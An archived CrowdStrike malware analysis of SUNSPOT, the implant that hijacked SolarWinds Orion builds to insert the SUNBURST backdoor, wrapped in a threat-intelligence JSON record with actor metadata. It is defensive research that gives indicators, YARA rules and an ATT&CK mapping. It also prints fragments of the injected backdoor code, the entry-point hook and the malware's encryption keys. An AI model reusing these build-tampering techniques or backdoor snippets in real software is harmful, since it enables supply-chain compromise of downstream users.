{ "id": "a6c65ed0-3992-481d-b71c-3a498d7366b7", "created_at": "2026-04-06T00:15:37.027291Z", "updated_at": "2026-04-10T03:37:33.151133Z", "deleted_at": null, "sha1_hash": "8396ad0567d9f0acede51cfcf3e432727d4da43b", "title": "SUNSPOT Malware: A Technical Analysis | CrowdStrike", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 139892, "plain_text": "SUNSPOT Malware: A Technical Analysis | CrowdStrike\r\nBy CrowdStrike Intelligence Team\r\nArchived: 2026-04-05 15:37:54 UTC\r\nIn December 2020, the industry was rocked by the disclosure of a complex supply chain attack against SolarWinds, Inc., a\r\nleading provider of network performance monitoring tools used by organizations of all sizes across the globe. CrowdStrike\r\nand another firm have been supporting SolarWinds in its investigation and root cause analysis of the events that led to the\r\ninclusion of unauthorized malicious code into its build cycle. In coordination with SolarWinds, which has posted a blog\r\ndetailing its efforts to ensure the security of its customers and build processes, CrowdStrike is providing a technical analysis\r\nof a malicious tool that was deployed into the build environment to inject this backdoor into the SolarWinds Orion platform\r\nwithout arousing the suspicion of the development team charged with delivering the product. At this time, CrowdStrike does\r\nnot attribute the SUNSPOT implant, SUNBURST backdoor or TEARDROP post-exploitation tool to any known adversary;\r\nas such, CrowdStrike Intelligence is tracking this intrusion under the StellarParticle activity cluster.\r\nKey Points\r\nSUNSPOT is StellarParticle’s malware used to insert the SUNBURST backdoor into software builds of the\r\nSolarWinds Orion IT management product.\r\nSUNSPOT monitors running processes for those involved in compilation of the Orion product and replaces one of\r\nthe source files to include the SUNBURST backdoor code.\r\nSeveral safeguards were added to SUNSPOT to avoid the Orion builds from failing, potentially alerting developers to\r\nthe adversary’s presence. \r\nAnalysis of a SolarWinds software build server provided insights into how the process was hijacked by StellarParticle in\r\norder to insert SUNBURST into the update packages. The design of SUNSPOT suggests StellarParticle developers invested\r\na lot of effort to ensure the code was properly inserted and remained undetected, and prioritized operational security to avoid\r\nrevealing their presence in the build environment to SolarWinds developers.\r\nSUNSPOT was identified on disk with a filename of taskhostsvc.exe (SHA256 Hash:\r\nc45c9bda8db1d470f1fd0dcc346dc449839eb5ce9a948c70369230af0b3ef168 ), and internally named taskhostw.exe by its\r\ndevelopers. It was likely built on 2020-02-20 11:40:02, according to the build timestamp found in the binary, which is\r\nconsistent with the currently assessed StellarParticle supply chain attack timeline. StellarParticle operators maintained the\r\npersistence of SUNSPOT by creating a scheduled task set to execute when the host boots. \r\nInitialization and Logging\r\nWhen SUNSPOT executes, it creates a mutex named {12d61a41-4b74-7610-a4d8-3028d2f56395} to ensure only one\r\ninstance is running. It then creates an encrypted log file at C:\\Windows\\Temp\\vmware-vmdmp.log . Individual log entries are\r\nencrypted with the stream cipher RC4, using the hard-coded key FC F3 2A 83 E5 F6 D0 24 A6 BF CE 88 30 C2 48 E7 .\r\nThroughout execution, SUNSPOT will log errors to this file, along with other deployment information. Log entries are\r\ndelineated by the hex string 32 78 A5 E7 1A 79 91 AC and begin with the number of seconds elapsed since the first log\r\nline. Most log lines corresponding to an error contain a step number (e.g., Step19) requiring knowledge of the malware to\r\nunderstand their meaning. These steps and their mapping to the malware actions are provided at the end of this blog. The\r\nstep numbering does not follow the actual execution order, suggesting the calls to the logging function were added by the\r\ndevelopers during the creation of the malware as they progressed and needed to focus their efforts on debugging one part of\r\nthe code. An extract of a log file generated by SUNSPOT in a test environment is given below.\r\n0.000 START\r\n22.781[3148] + 'msbuild.exe' [6252]\r\n181.421[3148] - 0\r\n194.343[3148] -\r\n194.343[13760] + 'msbuild.exe' [6252]\r\n322.812[13760] - 0\r\n324.250[13760] -\r\n324.250[14696] + 'msbuild.exe' [6252]\r\n351.125[14696] - 0\r\n352.031[14176] + 'msbuild.exe' [6252]\r\n369.203[14696] -\r\n375.093[14176] - 0\r\n376.343[14176] -\r\n376.343[11864] + 'msbuild.exe' [6252]\r\n426.500[11864] - 0\r\nhttps://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/\r\nPage 1 of 7\n\n439.953[11864] -\r\n439.953[9204] + 'msbuild.exe' [6252]\r\n485.343[9204] Solution directory: C:\\Users\\User\\Source\r\n485.343[ERROR]\r\nStep4('C:\\Users\\User\\Source\\Src\\Lib\\SolarWinds.Orion.Core.BusinessLayer\\BackgroundInventory\\InventoryManager.cs')\r\nfails\r\nThe malware then grants itself debugging privileges by modifying its security token to add SeDebugPrivilege . This step is\r\na prerequisite for the remainder of SUNSPOT’s execution, which involves reading other processes' memory. \r\nBuild Hijacking Steps\r\nMonitoring of Running Software Build Processes\r\nAfter initialization, SUNSPOT monitors running processes for instances of MsBuild.exe , which is part of Microsoft Visual\r\nStudio development tools. Copies of MsBuild.exe are identified by hashing the name of each running process and\r\ncomparing it to the corresponding value, 0x53D525 . The hashing algorithm used for the comparison is ElfHash and is\r\nprovided in Python in Figure 1.\r\ndef elf_hash(name):\r\n# Test input: b'msbuild.exe'\r\n# Test output: 0x53D525\r\nh = 0\r\nfor c in name:\r\nv = (c + (h \u003c\u003c 4))\r\nmsb = v \u0026 0xF0000000\r\nif msb != 0:\r\nv ^= (msb \u003e\u003e 24)\r\nh = ~msb \u0026 v\r\nreturn h\r\nFigure 1. Process Name Hashing Logic When SUNSPOT finds an MsBuild.exe process, it will spawn a new thread to\r\ndetermine if the Orion software is being built and, if so, hijack the build operation to inject SUNBURST. The monitoring\r\nloop executes every second, allowing SUNSPOT to modify the target source code before it has been read by the compiler.\r\nAlthough the mutex created during the initialization should already prevent multiple process monitoring loops from running,\r\nthe malware checks for the presence of a second mutex — {56331e4d-76a3-0390-a7ee-567adf5836b7} . If this mutex is\r\nfound, the backdoor interprets it as a signal to quit, waits for the completion of its currently running backdoor injection\r\nthreads, and exits. This mutex was likely intended to be used by StellarParticle operators to discreetly stop the malware,\r\ninstead of using a riskier method such as killing the process. Stopping SUNSPOT in the middle of its operation could result\r\nin unfinished tampering of the Orion source code, and lead to Orion build errors that SolarWinds developers would\r\ninvestigate, revealing the adversary’s presence.\r\nCommand-Line Arguments Extraction from Process Memory\r\nThe malware extracts the command-line arguments for each running MsBuild.exe process from the virtual memory using a\r\nmethodology similar to one publicly documented1. A call to NtQueryInformationProcess allows the adversary to obtain a\r\npointer to the remote process’s Process Environment Block (PEB), which contains a pointer to a\r\n_RTL_USER_PROCESS_PARAMETERS structure. The latter is read to get the full command line passed to the MsBuild.exe\r\nprocess. The command line is then parsed to extract individual arguments, and SUNSPOT looks for the directory path of the\r\nOrion software Visual Studio solution. This value is hard-coded in the binary, in an encrypted form using AES128-CBC,\r\nwhose parameters are given below. The same material is used for all of the blobs encrypted with AES in the binary.\r\nkey = FC F3 2A 83 E5 F6 D0 24 A6 BF CE 88 30 C2 48 E7 (same as the RC4 key)\r\niv = 81 8C 85 49 B9 00 06 78 0B E9 63 60 26 64 B2 DA\r\nThe key and initialization vector (IV) are not unique and can be independently found in other binary samples of several\r\npopular video games. It is plausible the material was chosen on purpose in order to make static detections on the values\r\nimpractical.\r\nOrion Source Code Replacement\r\nWhen SUNSPOT finds the Orion solution file path in a running MsBuild.exe process, it replaces a source code file in the\r\nsolution directory, with a malicious variant to inject SUNBURST while Orion is being built. While SUNSPOT supports\r\nreplacing multiple files, the identified copy only replaces InventoryManager.cs .\r\nThe malicious source code for SUNBURST, along with target file paths, are stored in AES128-CBC encrypted blobs and are\r\nprotected using the same key and initialization vector. As causing build errors would very likely prompt troubleshooting\r\nhttps://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/\r\nPage 2 of 7\n\nactions from the Orion developers and lead to the adversary’s discovery, the SUNSPOT developers included a hash\r\nverification check, likely to ensure the injected backdoored code is compatible with a known source file, and also avoid\r\nreplacing the file with garbage data from a failed decryption. In the exemplar SUNSPOT sample, the MD5 hash for the\r\nbackdoored source code is 5f40b59ee2a9ac94ddb6ab9e3bd776ca . If the decryption of the parameters (target file path and\r\nreplacement source code) is successful and if the MD5 checks pass, SUNSPOT proceeds with the replacement of the source\r\nfile content. The original source file is copied with a .bk extension (e.g., InventoryManager.bk ), to back up the original\r\ncontent. The backdoored source is written to the same filename, but with a .tmp extension (e.g., InventoryManager.tmp ),\r\nbefore being moved using MoveFileEx to the original filename ( InventoryManager.cs ). After these steps, the source file\r\nbackdoored with SUNBURST will then be compiled as part of the standard process. SUNSPOT appends an entry in the log\r\nfile with the date and time of the backdoor attempt and waits for the MsBuild.exe process to exit before restoring the\r\noriginal source code and deleting the temporary InventoryManager.bk file. If the Orion solution build is successful, it is\r\nbackdoored with SUNBURST.\r\nSUNBURST Source Code\r\nThe source code of SUNBURST was likely sanitized before being included in SUNSPOT. The use of generic variable\r\nnames, pre-obfuscated strings, and the lack of developer comments or disabled code is similar to what could be obtained\r\nafter decompiling a backdoored Orion binary, as illustrated in Figure 2, which provides a comparison between the injected\r\nsource code (top) and a decompilation output (bottom).\r\nprivate static class ProcessTracker { \r\nprivate static readonly object _lock = new object();\r\nprivate static bool SearchConfigurations()\r\n{ \r\nusing (ManagementObjectSearcher managementObjectSearcher = new\r\nManagementObjectSearcher(ZipHelper.Unzip(\"C07NSU0uUdBScCvKz1UIz8wzNooPriwuSc11KcosSy0CAA==\")))\r\n{\r\nforeach (ManagementObject item in managementObjectSearcher.Get())\r\n{\r\nulong hash =\r\nGetHash(Path.GetFileName(item.Properties[ZipHelper.Unzip(\"C0gsyfBLzE0FAA==\")].Value.ToString()).ToLower());\r\nif (Array.IndexOf(configTimeStamps, hash) != -1)\r\n{\r\nreturn true;\r\n}\r\n}\r\n}\r\nreturn false;\r\n}\r\nprivate static class ProcessTracker {\r\n// Token: 0x0600097C RID: 2428 RVA: 0x000435A4 File Offset: 0x000417A4\r\nprivate static bool SearchConfigurations()\r\n{\r\nusing (ManagementObjectSearcher managementObjectSearcher = new\r\nManagementObjectSearcher(OrionImprovementBusinessLayer.ZipHelper.Unzip(\"C07NSU0uUdBScCvKz1UIz8wzNooPriwuSc11KcosSy0CAA==\")))\r\n{\r\nforeach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())\r\n{\r\nulong hash =\r\nOrionImprovementBusinessLayer.GetHash(Path.GetFileName(((ManagementObject)managementBaseObject).Properties[OrionImprovementBusinessLayer.\r\nif (Array.IndexOf\u003culong\u003e(OrionImprovementBusinessLayer.configTimeStamps, hash) != -1)\r\n{\r\nreturn true;\r\n}\r\n}\r\n}\r\nreturn false;\r\n}\r\nFigure 2. Comparison between injected source code (top) and decompiled using DnSpy (bottom) In order to remove\r\ncompilation warnings that could be generated by the adversary’s own code — which could alert the SolarWinds developers\r\n— StellarParticle made their edits within #pragma warning disable and #pragma warning restore statements, hinting at\r\nhttps://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/\r\nPage 3 of 7\n\nwhat parts were edited. In particular, SUNSPOT’s entry point was added to the legitimate Orion software RefreshInternal\r\nfunction by adding the following try/catch block:\r\ntry {   if (!OrionImprovementBusinessLayer.IsAlive) {\r\n       Thread th = new Thread(OrionImprovementBusinessLayer.Initialize)\r\n           { IsBackground = true };\r\n       th.Start();\r\n   }\r\n} catch (Exception) {\r\n}\r\nTactics, Techniques and Procedures (TTPs)\r\nThe following TTPs may be used to characterize the SUNSPOT activity described in this blog:\r\nPersistence using scheduled tasks, triggered at boot time\r\nUse of AES128-CBC to protect the targeted source code files and the backdoored source code file in the binary\r\nUse of RC4 encryption with a hard-coded key to protect the log file entries\r\nLog entries from different executions of the malware that are separated with a hard-coded value 32 78 A5 E7 1A 79\r\n91 AC\r\nLog file creation in the system temp directory C:\\Windows\\Temp\\vmware-vmdmp.log masquerading as a legitimate\r\nVMWare log file\r\nDetection of the targeted Visual Studio solution build by reading the virtual memory of MsBuild.exe processes,\r\nlooking for the targeted solution filename\r\nAccess to the remote process arguments made via the remote process’s PEB structure\r\nReplacement of source code files during the build process, before compilation, by replacing file content with another\r\nversion containing SUNBURST\r\nInsertion of the backdoor code within #pragma statements disabling and restoring warnings, to prevent the backdoor\r\ncode lines from appearing in build logs\r\nCheck of the MD5 hashes of the original source code and of the backdoored source code to ensure the tampering will\r\nnot cause build errors\r\nAttempt to open a non-existing mutex to detect when the malware operators want the backdoor to stop execution and\r\nsafely exit\r\nHost Indicators of Attack\r\nThe tables below detail files belonging to the SUNSPOT campaigns including filename, SHA256 hash, and build time when\r\nknown.\r\nExecutables\r\nFilename SHA256 Hash Build Time (UTC)\r\ntaskh ostsvc.exe c45c9bda8db1d470f1fd0dcc346dc449839eb5ce9a948c70369230af0b3ef168\r\n2 020-02-20\r\n11:40:02\r\nRelated Files\r\nDescription SHA256 Hash\r\nBackdoored Orion source code with\r\nSUNSPOT\r\n0819db19be479122c1d48743e644070a8dc9a1c852df9a8c0dc2343e904da389\r\nFile System\r\nThe presence of one or more of the following files may indicate a SUNSPOT infection.\r\nFile Path Description\r\nC:\\Windows\\Temp\\vmware-vmdmp.log Encrypted log file\r\nVolatile Artifacts\r\nName Type Description\r\n{12d61a41-4b74-7610-a4d8-3028d2f56395} Mutex Ensures a single implant instance\r\nhttps://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/\r\nPage 4 of 7\n\n{56331e4d-76a3-0390-a7ee-567adf5836b7} Mutex Used to signal to the malware to safely exit\r\nYARA Rules\r\nrule CrowdStrike_SUNSPOT_01 : artifact stellarparticle sunspot{\r\nmeta:\r\ncopyright = \"(c) 2021 CrowdStrike Inc.\"\r\ndescription = \"Detects RC4 and AES key encryption material in SUNSPOT\"\r\nversion = \"202101081448\"\r\nlast_modified = \"2021-01-08\"\r\nactor = \"StellarParticle\"\r\nmalware_family = \"SUNSPOT\"\r\nstrings:\r\n$key = {fc f3 2a 83 e5 f6 d0 24 a6 bf ce 88 30 c2 48 e7}\r\n$iv = {81 8c 85 49 b9 00 06 78 0b e9 63 60 26 64 b2 da}\r\ncondition:\r\nall of them and filesize \u003c 32MB\r\n}\r\nrule CrowdStrike_SUNSPOT_02 : artifact stellarparticle sunspot\r\n{\r\nmeta:\r\ncopyright = \"(c) 2021 CrowdStrike Inc.\"\r\ndescription = \"Detects mutex names in SUNSPOT\"\r\nversion = \"202101081448\"\r\nlast_modified = \"2021-01-08\"\r\nactor = \"StellarParticle\"\r\nmalware_family = \"SUNSPOT\"\r\nstrings:\r\n$mutex_01 = \"{12d61a41-4b74-7610-a4d8-3028d2f56395}\" wide ascii\r\n$mutex_02 = \"{56331e4d-76a3-0390-a7ee-567adf5836b7}\" wide ascii\r\ncondition:\r\nany of them and filesize \u003c 10MB\r\n}\r\nrule CrowdStrike_SUNSPOT_03 : artifact logging stellarparticle sunspot\r\n{\r\nmeta:\r\ncopyright = \"(c) 2021 CrowdStrike Inc.\"\r\ndescription = \"Detects log format lines in SUNSPOT\"\r\nversion = \"202101081443\"\r\nlast_modified = \"2021-01-08\"\r\nactor = \"StellarParticle\"\r\nmalware_family = \"SUNSPOT\"\r\nstrings:\r\n$s01 = \"[ERROR] ***Step1('%ls','%ls') fails with error %#x***\\x0A\" ascii\r\n$s02 = \"[ERROR] Step2 fails\\x0A\" ascii\r\n$s03 = \"[ERROR] Step3 fails\\x0A\" ascii\r\n$s04 = \"[ERROR] Step4('%ls') fails\\x0A\" ascii\r\n$s05 = \"[ERROR] Step5('%ls') fails\\x0A\" ascii\r\n$s06 = \"[ERROR] Step6('%ls') fails\\x0A\" ascii\r\n$s07 = \"[ERROR] Step7 fails\\x0A\" ascii\r\n$s08 = \"[ERROR] Step8 fails\\x0A\" ascii\r\n$s09 = \"[ERROR] Step9('%ls') fails\\x0A\" ascii\r\n$s10 = \"[ERROR] Step10('%ls','%ls') fails with error %#x\\x0A\" ascii\r\n$s11 = \"[ERROR] Step11('%ls') fails\\x0A\" ascii\r\n$s12 = \"[ERROR] Step12('%ls','%ls') fails with error %#x\\x0A\" ascii\r\n$s13 = \"[ERROR] Step30 fails\\x0A\" ascii\r\n$s14 = \"[ERROR] Step14 fails with error %#x\\x0A\" ascii\r\n$s15 = \"[ERROR] Step15 fails\\x0A\" ascii\r\n$s16 = \"[ERROR] Step16 fails\\x0A\" ascii\r\n$s17 = \"[%d] Step17 fails with error %#x\\x0A\" ascii\r\n$s18 = \"[%d] Step18 fails with error %#x\\x0A\" ascii\r\n$s19 = \"[ERROR] Step19 fails with error %#x\\x0A\" ascii\r\nhttps://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/\r\nPage 5 of 7\n\n$s20 = \"[ERROR] Step20 fails\\x0A\" ascii\r\n$s21 = \"[ERROR] Step21(%d,%s,%d) fails\\x0A\" ascii\r\n$s22 = \"[ERROR] Step22 fails with error %#x\\x0A\" ascii\r\n$s23 = \"[ERROR] Step23 fails with error %#x\\x0A\" ascii\r\n$s24 = \"[%d] Solution directory: %ls\\x0A\" ascii\r\n$s25 = \"[%d] %04d-%02d-%02d %02d:%02d:%02d:%03d %ls\\x0A\" ascii\r\n$s26 = \"[%d] + '%s' \" ascii\r\ncondition:\r\n2 of them and filesize \u003c 10MB\r\n}\r\nATT\u0026CK Framework\r\nThe following table maps reported SUNSPOT TTPs to the MITRE ATT\u0026CK® framework.\r\nTactic Technique Observable\r\nReconnaissance\r\nT1592.002 Gather Victim\r\nHost Information - Software\r\nStellarParticle had an understanding of the Orion build chain\r\nbefore SUNSPOT was developed to tamper with it.\r\nResource\r\nDevelopment\r\nT1587.001 Develop\r\nCapabilities - Malware\r\nSUNSPOT was weaponized to specifically target the Orion build\r\nto replace one source code file and include the SUNBURST\r\nbackdoor.\r\nPersistence T1053.005 Scheduled Task\r\nSUNSPOT is persisted in a scheduled task set to execute after the\r\nhost has booted.\r\nDefense Evasion\r\nT1140 Deobfuscate/Decode\r\nInformation\r\nThe configuration in SUNSPOT is encrypted using AES128-\r\nCBC. It contains the replacement source code, the targeted\r\nVisual Studio solution file name, and targeted source code file\r\npaths relative to the solution directory.\r\nT1027 Obfuscated Files or\r\nInformation\r\nThe log file SUNSPOT writes is encrypted using RC4.\r\nT1480 Execution Guardrails\r\nThe replacement of source code is done only if the MD5\r\nchecksums of both the original source code file and backdoored\r\nreplacement source code match hardcoded values.\r\nT1036 Masquerading\r\nSUNSPOT masquerades as a legitimate Windows Binary, and\r\nwrites its logs in a fake VMWare log file.\r\nDiscovery T1057 Process Discovery\r\nSUNSPOT monitors running processes looking for instances of\r\nMsBuild.exe.\r\nImpact\r\nT1565.001 Data\r\nManipulation Stored - Data\r\nManipulation\r\nModification of the Orion source code to inject SUNBURST.\r\nLogged Steps and Corresponding Errors\r\nThe following table provides a mapping of the step numbers found in the log file to the actual action performed by\r\nSUNSPOT. The step numbering does not reflect the actual execution order. Some values are also missing.\r\nStep In Log\r\nFile Meaning\r\nSTART Logged after the initialization has completed successfully\r\nStep1 Original file cannot be restored after tampering with the build process\r\nStep2 Could not decrypt one of the targeted source code file’s path (relative to the solution directory)\r\nStep3 Could not create the file path for the targeted source code file\r\nStep4 Could not get the size of the original source code file\r\nStep5 Computation of the MD5 hash of the original source file failed\r\nStep6\r\nThere was a mismatch between the expected target original source code file MD5 hash and the\r\nexpected value\r\nhttps://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/\r\nPage 6 of 7\n\nStep7 Could not successfully decrypt the backdoored source code\r\nStep8 Computation of the MD5 hash of the backdoored source code failed\r\nStep9\r\nThere was a mismatch between the expected backdoored source code data MD5 hash and the\r\nexpected value\r\nStep10 Could not create backup of the original source code file\r\nStep11 Could not write the backdoored source code to disk (in the .tmp file)\r\nStep12\r\nCould not copy the temporary file with the backdoored source code (with the .tmp extension) to the\r\npath of the original source\r\nStep14 Could not read the MsBuild.exe process memory to resolve its command-line arguments\r\nStep15 The returned PEB address for the remote process is zero\r\nStep16 Calling NtQueryInformationProcess failed\r\nStep17 Could not create a handle to the MsBuild.exe process with SYNCHRONIZE access\r\nStep18 Could not successfully wait for the MsBuild.exe process termination\r\nStep19 Obtention of the address of the NtQueryInformationProcess function failed\r\nStep20 Modification of the process security token to obtain SeDebugPrivileges failed\r\nStep21\r\nThe number of currently running tampering threads exceeded 256, and SUNSPOT cannot track more\r\nthreads\r\nStep22 Unable to get a list of running processes\r\nStep23 There was an error when enumerating the running processes list\r\nStep30 Could not decrypt the solution name core.sln\r\nFootnote: 1. https[:]//blog.xpnsec[.]com/how-to-argue-like-cobalt-strike/\r\nAdditional Resources\r\nRead a blog on this topic from SolarWinds.\r\nDownload the CrowdStrike 2020 Global Threat Report.\r\nTo learn more about how to incorporate intelligence on threats into your security strategy, visit the CROWDSTRIKE\r\nFALCON® INTELLIGENCE™  Premium Threat Intelligence page.\r\nGet a full-featured free trial of CrowdStrike Falcon® Prevent™ and learn how true next-gen AV performs against\r\ntoday’s most sophisticated threats.\r\nSource: https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/\r\nhttps://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/\r\nPage 7 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE", "ETDA", "Malpedia" ], "references": [ "https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/" ], "report_names": [ "sunspot-malware-technical-analysis" ], "threat_actors": [ { "id": "b43e5ea9-d8c8-4efa-b5bf-f1efb37174ba", "created_at": "2022-10-25T16:07:24.36191Z", "updated_at": "2026-04-10T02:00:04.954902Z", "deleted_at": null, "main_name": "UNC2452", "aliases": [ "Dark Halo", "Nobelium", "SolarStorm", "StellarParticle", "UNC2452" ], "source_name": "ETDA:UNC2452", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "1d3f9dec-b033-48a5-8b1e-f67a29429e89", "created_at": "2022-10-25T15:50:23.739197Z", "updated_at": "2026-04-10T02:00:05.275809Z", "deleted_at": null, "main_name": "UNC2452", "aliases": [ "UNC2452", "NOBELIUM", "StellarParticle", "Dark Halo" ], "source_name": "MITRE:UNC2452", "tools": [ "Sibot", "Mimikatz", "Cobalt Strike", "AdFind", "GoldMax" ], "source_id": "MITRE", "reports": null }, { "id": "a241a1ca-2bc9-450b-a07b-aae747ee2710", "created_at": "2024-06-19T02:03:08.150052Z", "updated_at": "2026-04-10T02:00:03.737173Z", "deleted_at": null, "main_name": "IRON RITUAL", "aliases": [ "APT29", "Blue Dev 5 ", "BlueBravo ", "Cloaked Ursa ", "CozyLarch ", "Dark Halo ", "Midnight Blizzard ", "NOBELIUM ", "StellarParticle ", "UNC2452 " ], "source_name": "Secureworks:IRON RITUAL", "tools": [ "Brute Ratel C4", "Cobalt Strike", "EnvyScout", "GoldFinder", "GoldMax", "NativeZone", "RAINDROP", "SUNBURST", "Sibot", "TEARDROP", "VaporRage" ], "source_id": "Secureworks", "reports": null }, { "id": "70872c3a-e788-4b55-a7d6-b2df52001ad0", "created_at": "2023-01-06T13:46:39.18401Z", "updated_at": "2026-04-10T02:00:03.239111Z", "deleted_at": null, "main_name": "UNC2452", "aliases": [ "DarkHalo", "StellarParticle", "NOBELIUM", "Solar Phoenix", "Midnight Blizzard" ], "source_name": "MISPGALAXY:UNC2452", "tools": [ "SNOWYAMBER", "HALFRIG", "QUARTERRIG" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270", "created_at": "2022-10-25T16:07:23.341684Z", "updated_at": "2026-04-10T02:00:04.549917Z", "deleted_at": null, "main_name": "APT 29", "aliases": [ "APT 29", "ATK 7", "Blue Dev 5", "BlueBravo", "Cloaked Ursa", "CloudLook", "Cozy Bear", "Dark Halo", "Earth Koshchei", "G0016", "Grizzly Steppe", "Group 100", "ITG11", "Iron Hemlock", "Iron Ritual", "Midnight Blizzard", "Minidionis", "Nobelium", "NobleBaron", "Operation Ghost", "Operation Office monkeys", "Operation StellarParticle", "SilverFish", "Solar Phoenix", "SolarStorm", "StellarParticle", "TEMP.Monkeys", "The Dukes", "UNC2452", "UNC3524", "Yttrium" ], "source_name": "ETDA:APT 29", "tools": [ "7-Zip", "ATI-Agent", "AdFind", "Agentemis", "AtNow", "BEATDROP", "BotgenStudios", "CEELOADER", "Cloud Duke", "CloudDuke", "CloudLook", "Cobalt Strike", "CobaltStrike", "CosmicDuke", "Cozer", "CozyBear", "CozyCar", "CozyDuke", "Danfuan", "EnvyScout", "EuroAPT", "FatDuke", "FoggyWeb", "GeminiDuke", "Geppei", "GoldFinder", "GoldMax", "GraphDrop", "GraphicalNeutrino", "GraphicalProton", "HAMMERTOSS", "HammerDuke", "LOLBAS", "LOLBins", "LiteDuke", "Living off the Land", "MagicWeb", "Mimikatz", "MiniDionis", "MiniDuke", "NemesisGemina", "NetDuke", "OnionDuke", "POSHSPY", "PinchDuke", "PolyglotDuke", "PowerDuke", "QUIETEXIT", "ROOTSAW", "RegDuke", "Rubeus", "SNOWYAMBER", "SPICYBEAT", "SUNSHUTTLE", "SeaDaddy", "SeaDask", "SeaDesk", "SeaDuke", "Sharp-SMBExec", "SharpView", "Sibot", "Solorigate", "SoreFang", "TinyBaron", "WINELOADER", "WellMail", "WellMess", "cobeacon", "elf.wellmess", "reGeorg", "tDiscoverer" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434537, "ts_updated_at": 1775792253, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/8396ad0567d9f0acede51cfcf3e432727d4da43b.pdf", "text": "https://archive.orkl.eu/8396ad0567d9f0acede51cfcf3e432727d4da43b.txt", "img": "https://archive.orkl.eu/8396ad0567d9f0acede51cfcf3e432727d4da43b.jpg" } }